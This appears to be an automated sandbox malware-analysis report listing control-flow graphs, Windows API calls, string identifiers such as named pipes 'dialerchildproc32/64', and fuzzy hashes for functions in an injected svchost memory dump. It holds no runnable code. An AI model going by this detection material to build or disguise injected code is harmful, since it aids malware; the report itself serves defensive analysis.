                                                                      control_flow_graph 304 1fb539cce28-1fb539cce4a GetLastError 305 1fb539cce69-1fb539cce74 FlsSetValue 304->305 306 1fb539cce4c-1fb539cce57 FlsGetValue 304->306 309 1fb539cce76-1fb539cce79 305->309 310 1fb539cce7b-1fb539cce80 305->310 307 1fb539cce59-1fb539cce61 306->307 308 1fb539cce63 306->308 311 1fb539cced5-1fb539ccee0 SetLastError 307->311 308->305 309->311 312 1fb539cce85 call 1fb539cd6cc 310->312 313 1fb539ccef5-1fb539ccf0b call 1fb539cc748 311->313 314 1fb539ccee2-1fb539ccef4 311->314 315 1fb539cce8a-1fb539cce96 312->315 328 1fb539ccf28-1fb539ccf33 FlsSetValue 313->328 329 1fb539ccf0d-1fb539ccf18 FlsGetValue 313->329 317 1fb539ccea8-1fb539cceb2 FlsSetValue 315->317 318 1fb539cce98-1fb539cce9f FlsSetValue 315->318 319 1fb539cceb4-1fb539ccec4 FlsSetValue 317->319 320 1fb539ccec6-1fb539cced0 call 1fb539ccb94 call 1fb539cd744 317->320 322 1fb539ccea1-1fb539ccea6 call 1fb539cd744 318->322 319->322 320->311 322->309 330 1fb539ccf98-1fb539ccf9f call 1fb539cc748 328->330 331 1fb539ccf35-1fb539ccf3a 328->331 333 1fb539ccf1a-1fb539ccf1e 329->333 334 1fb539ccf22 329->334 336 1fb539ccf3f call 1fb539cd6cc 331->336 333->330 337 1fb539ccf20 333->337 334->328 340 1fb539ccf44-1fb539ccf50 336->340 338 1fb539ccf8f-1fb539ccf97 337->338 341 1fb539ccf62-1fb539ccf6c FlsSetValue 340->341 342 1fb539ccf52-1fb539ccf59 FlsSetValue 340->342 344 1fb539ccf80-1fb539ccf8a call 1fb539ccb94 call 1fb539cd744 341->344 345 1fb539ccf6e-1fb539ccf7e FlsSetValue 341->345 343 1fb539ccf5b-1fb539ccf60 call 1fb539cd744 342->343 343->330 344->338 345->343
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 000001FB539CCE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCEBC
                                                                      • SetLastError.KERNEL32 ref: 000001FB539CCED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,000001FB539CECCC,?,?,?,?,000001FB539CBF9F,?,?,?,?,?,000001FB539C7AB0), ref: 000001FB539CCF2C
                                                                        • Part of subcall function 000001FB539CD6CC: HeapAlloc.KERNEL32 ref: 000001FB539CD721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF54
                                                                        • Part of subcall function 000001FB539CD744: HeapFree.KERNEL32 ref: 000001FB539CD75A
                                                                        • Part of subcall function 000001FB539CD744: GetLastError.KERNEL32 ref: 000001FB539CD764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF76
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: 6d41343913785b7a6c2472a831a74eef6234c9dfd0991a1be6bdcb384e67cf70
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: C8412BF020B24F42FA68A725D6D63F927435B857B0F5C0734A9374A7FADB2C98029A50

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: 03d7399eea3254e19b5d8266f2eebc46fa5138ef8e7893cb31c7892e277a4139
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: C721567661974583FB10CB25F4853A977A2F789B94F584625DA9A03BB8CF3CC145CB00

                                                                      Control-flow Graph

                                                                      control_flow_graph 570 1fb539ca544-1fb539ca5ac call 1fb539cb414 573 1fb539caa13-1fb539caa1b call 1fb539cc748 570->573 574 1fb539ca5b2-1fb539ca5b5 570->574 574->573 576 1fb539ca5bb-1fb539ca5c1 574->576 577 1fb539ca5c7-1fb539ca5cb 576->577 578 1fb539ca690-1fb539ca6a2 576->578 577->578 582 1fb539ca5d1-1fb539ca5dc 577->582 580 1fb539ca6a8-1fb539ca6ac 578->580 581 1fb539ca963-1fb539ca967 578->581 580->581 583 1fb539ca6b2-1fb539ca6bd 580->583 585 1fb539ca969-1fb539ca970 581->585 586 1fb539ca9a0-1fb539ca9aa call 1fb539c9634 581->586 582->578 584 1fb539ca5e2-1fb539ca5e7 582->584 583->581 587 1fb539ca6c3-1fb539ca6ca 583->587 584->578 588 1fb539ca5ed-1fb539ca5f7 call 1fb539c9634 584->588 585->573 589 1fb539ca976-1fb539ca99b call 1fb539caa1c 585->589 586->573 599 1fb539ca9ac-1fb539ca9cb call 1fb539c7940 586->599 591 1fb539ca894-1fb539ca8a0 587->591 592 1fb539ca6d0-1fb539ca707 call 1fb539c9a10 587->592 588->599 603 1fb539ca5fd-1fb539ca628 call 1fb539c9634 * 2 call 1fb539c9d24 588->603 589->586 591->586 596 1fb539ca8a6-1fb539ca8aa 591->596 592->591 607 1fb539ca70d-1fb539ca715 592->607 600 1fb539ca8ba-1fb539ca8c2 596->600 601 1fb539ca8ac-1fb539ca8b8 call 1fb539c9ce4 596->601 600->586 606 1fb539ca8c8-1fb539ca8d5 call 1fb539c98b4 600->606 601->600 614 1fb539ca8db-1fb539ca8e3 601->614 638 1fb539ca648-1fb539ca652 call 1fb539c9634 603->638 639 1fb539ca62a-1fb539ca62e 603->639 606->586 606->614 612 1fb539ca719-1fb539ca74b 607->612 616 1fb539ca887-1fb539ca88e 612->616 617 1fb539ca751-1fb539ca75c 612->617 619 1fb539ca8e9-1fb539ca8ed 614->619 620 1fb539ca9f6-1fb539caa12 call 1fb539c9634 * 2 call 1fb539cc6a8 614->620 616->591 616->612 617->616 621 1fb539ca762-1fb539ca77b 617->621 623 1fb539ca8ef-1fb539ca8fe call 1fb539c9ce4 619->623 624 1fb539ca900 619->624 620->573 625 1fb539ca874-1fb539ca879 621->625 626 1fb539ca781-1fb539ca7c6 call 1fb539c9cf8 * 2 621->626 634 1fb539ca903-1fb539ca90d call 1fb539cb4ac 623->634 
624->634 630 1fb539ca884 625->630 654 1fb539ca7c8-1fb539ca7ee call 1fb539c9cf8 call 1fb539cac38 626->654 655 1fb539ca804-1fb539ca80a 626->655 630->616 634->586 646 1fb539ca913-1fb539ca961 call 1fb539c9944 call 1fb539c9b50 634->646 638->578 653 1fb539ca654-1fb539ca674 call 1fb539c9634 * 2 call 1fb539cb4ac 638->653 639->638 645 1fb539ca630-1fb539ca63b 639->645 645->638 650 1fb539ca63d-1fb539ca642 645->650 646->586 650->573 650->638 676 1fb539ca676-1fb539ca680 call 1fb539cb59c 653->676 677 1fb539ca68b 653->677 670 1fb539ca815-1fb539ca872 call 1fb539ca470 654->670 671 1fb539ca7f0-1fb539ca802 654->671 659 1fb539ca87b 655->659 660 1fb539ca80c-1fb539ca810 655->660 664 1fb539ca880 659->664 660->626 664->630 670->664 671->654 671->655 680 1fb539ca686-1fb539ca9ef call 1fb539c92ac call 1fb539caff4 call 1fb539c94a0 676->680 681 1fb539ca9f0-1fb539ca9f5 call 1fb539cc6a8 676->681 677->578 680->681 681->620
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: 338b81fb1fb998c2e9a63077ae0a77f9f53bcbf061a28ddd9ec4cac16e89678f
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: 73E1D5B261A74A8AEB20DF25D4C13ED77A2F745B98F0C0125EE8A57BA5CB3CC581C701

                                                                      Control-flow Graph

                                                                      control_flow_graph 449 1fb53999944-1fb539999ac call 1fb5399a814 452 1fb53999e13-1fb53999e1b call 1fb5399bb48 449->452 453 1fb539999b2-1fb539999b5 449->453 453->452 454 1fb539999bb-1fb539999c1 453->454 457 1fb539999c7-1fb539999cb 454->457 458 1fb53999a90-1fb53999aa2 454->458 457->458 461 1fb539999d1-1fb539999dc 457->461 459 1fb53999d63-1fb53999d67 458->459 460 1fb53999aa8-1fb53999aac 458->460 462 1fb53999d69-1fb53999d70 459->462 463 1fb53999da0-1fb53999daa call 1fb53998a34 459->463 460->459 464 1fb53999ab2-1fb53999abd 460->464 461->458 465 1fb539999e2-1fb539999e7 461->465 462->452 467 1fb53999d76-1fb53999d9b call 1fb53999e1c 462->467 463->452 477 1fb53999dac-1fb53999dcb call 1fb53996d40 463->477 464->459 469 1fb53999ac3-1fb53999aca 464->469 465->458 466 1fb539999ed-1fb539999f7 call 1fb53998a34 465->466 466->477 480 1fb539999fd-1fb53999a28 call 1fb53998a34 * 2 call 1fb53999124 466->480 467->463 470 1fb53999c94-1fb53999ca0 469->470 471 1fb53999ad0-1fb53999b07 call 1fb53998e10 469->471 470->463 478 1fb53999ca6-1fb53999caa 470->478 471->470 485 1fb53999b0d-1fb53999b15 471->485 482 1fb53999cba-1fb53999cc2 478->482 483 1fb53999cac-1fb53999cb8 call 1fb539990e4 478->483 517 1fb53999a48-1fb53999a52 call 1fb53998a34 480->517 518 1fb53999a2a-1fb53999a2e 480->518 482->463 484 1fb53999cc8-1fb53999cd5 call 1fb53998cb4 482->484 483->482 493 1fb53999cdb-1fb53999ce3 483->493 484->463 484->493 491 1fb53999b19-1fb53999b4b 485->491 495 1fb53999c87-1fb53999c8e 491->495 496 1fb53999b51-1fb53999b5c 491->496 498 1fb53999df6-1fb53999e12 call 1fb53998a34 * 2 call 1fb5399baa8 493->498 499 1fb53999ce9-1fb53999ced 493->499 495->470 495->491 496->495 500 1fb53999b62-1fb53999b7b 496->500 498->452 502 1fb53999d00 499->502 503 1fb53999cef-1fb53999cfe call 1fb539990e4 499->503 504 1fb53999c74-1fb53999c79 500->504 505 1fb53999b81-1fb53999bc6 call 1fb539990f8 * 2 500->505 513 1fb53999d03-1fb53999d0d call 1fb5399a8ac 502->513 
Control-flow Graph (remainder of the basic-block edge list for the preceding function; not reproduced)
Memory Dump Source
• Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction ID: fa9bbf22c5165d2bb50162e04197a4c728e4534f610685b807383e084df18b8a
• Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction Fuzzy Hash: 5FE1A2B360A7428AFB60DF65D4D03ED77A6F749798F180125EE4A57BA5DB38C091CB00

Control-flow Graph (basic-block edge list not reproduced; API calls appearing in the graph: LoadLibraryExW, GetLastError, GetProcAddress, FreeLibrary)
Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction ID: 4aa6df102775c91470a30eaca5d58870190ca1f5ab6b237e14a952d32f0ac0da
• Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction Fuzzy Hash: 2F41F1B231FA4681FA16CB16E8843F52393BB49BA0F4D45399D0B877A4EF3CC4458360

Control-flow Graph (basic-block edge list not reproduced; API calls appearing in the graph: RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapAlloc, HeapFree)
Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction ID: cd5e0a5dff588b072592f6f5fec2fbd5c03b9c3fd72847433edc5f87d93d953f
• Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: 2C416273219B85C6E760CF61E4847AF77A2F389B98F488125DA8A47768DF3CC545CB40

Control-flow Graph (not reproduced)
APIs
• FlsGetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD087
• FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0A6
• FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0CE
• FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0DF
• FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0F0
Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
• Instruction ID: 968b9330f179ee5e314775584756f230334fc7093088daeda48f812371d2e503
• Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
• Instruction Fuzzy Hash: DD110DB060E28E41FA68A72AD6D23FA63435B847E0F5C4235982B467FADB2C85029710
Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction ID: caca88eb4ff424c5bfd08270abe60720f522a2b93f121c2b0dd3a671aa919aca
• Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction Fuzzy Hash: 60817BF960A64BCEFB50AB69E4D13F96392AB89780F5C44359A07C77B6DB3CC8458700

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
• Instruction ID: 76704e09874f35ba00da39aab094292295e922183a9bda5e610428fd81b52da4
• Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
• Instruction Fuzzy Hash: BA31C0B121BA46A1EE22DB42E880BF56396B758BA0F5D09359D2F0B7A1EF3CC5558300

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
• Instruction ID: f19f250884e5a5ca10a7d28f396b53d68425f9b958b93f700f72ddf209fe23ad
• Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
• Instruction Fuzzy Hash: F2116072319B8286F7508B56F88536967A1F788FE5F484634EA5B877A4CF7CC8148740

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction ID: 5c0b12d5fc8e251d62a9ecb423148d3d6f5980d317266ae4fff7775e2e87b1f2
• Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction Fuzzy Hash: 8B115E7670AB8682FF549B66F4842B963A2F748B85F4C0439DE8A077A4EF3DC505C704
Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
• Instruction ID: 5469abee5b4e9bf0bdf770da9b99d52bae9361e8749dbde8dcbd5f420d2bc2f2
• Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
• Instruction Fuzzy Hash: 17D17D76209B4985EB709B16E4D43AA77A1F3C8B84F580126EACE47BB5DF3CC551CB40

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: dialer
• API String ID: 756756679-3528709123
• Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
• Instruction ID: cc9ad914701f13315fd69f315d2c8feb691bd09a9d7ccb6b0530ae7b9a7b48cd
• Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
• Instruction Fuzzy Hash: C131837670AB5A82FA15DF56D5C07BAA792FB44B84F0C44309E8A47B65EF3CC4A18740

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
• Instruction ID: 8e2cc52478816b46073d1eda117981dfc24803c2b807f92ef055f03951766850
• Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
• Instruction Fuzzy Hash: 4A115EB020F28A81FA64A726D6C63BD63435B887F0F5C4734A837467FADF6C84029710

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
• Instruction ID: d96a0d85e18bd00034df92b739627b984554b744396f702b8ef2f930aa75394b
• Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
• Instruction Fuzzy Hash: 67016D71309A8682FB14DB52E4883AA63A2F788BC0F8C4435DE8A43765DF3CC549C700
Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
• Instruction ID: fda331bf91d84a1e7dd7c21d20511b9b3e708f0354f79a4ceedf790b70eea54f
• Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
• Instruction Fuzzy Hash: 650121B521A74682FB249B56F8893A563A2BB49B85F4C4834CD4A07774EF3DC1448B00

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
• Instruction ID: 170696c3728ef68149a4f5dd5ab44c4829b88e797df50feb444b0b5984898a95
• Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
• Instruction Fuzzy Hash: 4551BFB270A24B8AEB14CB15E489BBA3797F344B88F5D8534DA07477A8EB39C841C704

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
• Instruction ID: a804f7a027a439150108e4f724fee75847e24b7a128904c366b285a41af1a838
• Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
• Instruction Fuzzy Hash: DD31D1B220A686C6E714DF12E8897AA77A6F344B88F4D8434EE47477A9DB3DC941C704

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
• Instruction ID: 7041c7b363bb532df87a82727498a3c47e6c77f4aba70d1cec084aacf5478d1c
• Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
• Instruction Fuzzy Hash: BCF044B230968692F7608F21F8C47A96762F748BC8FCC4030DA4A46A64DF3CC64DCB04
Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
• Instruction ID: 3d718759b31359e7105f5c9c5d76d0a703cea5687920891f1199a65a2e33e12e
• Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
• Instruction Fuzzy Hash: 50F0F8B561ABC682FA148B52F9951A9A762AB48FD0F4C9530EE4B47B28DF2CC4458700

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
• Instruction ID: 02050852133c47cbee4d85a20b7f67a6a3ee0c205252fbf7605758d57af0b57c
• Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
• Instruction Fuzzy Hash: 64F062B521A64681FB108F29E4853B96322EB85761F9C0A39CA6B453F4DF3CC444C340

Memory Dump Source
• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
• Instruction ID: 53032330eb2a6da8034d978688d882b7e120780e33b779c8a0d6604ede2127e4
• Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
• Instruction Fuzzy Hash: E002CB7221EB8586E760CB56F4947AAB7A1F3C4794F184025EACE87BA9DF7CC454CB00

Memory Dump Source
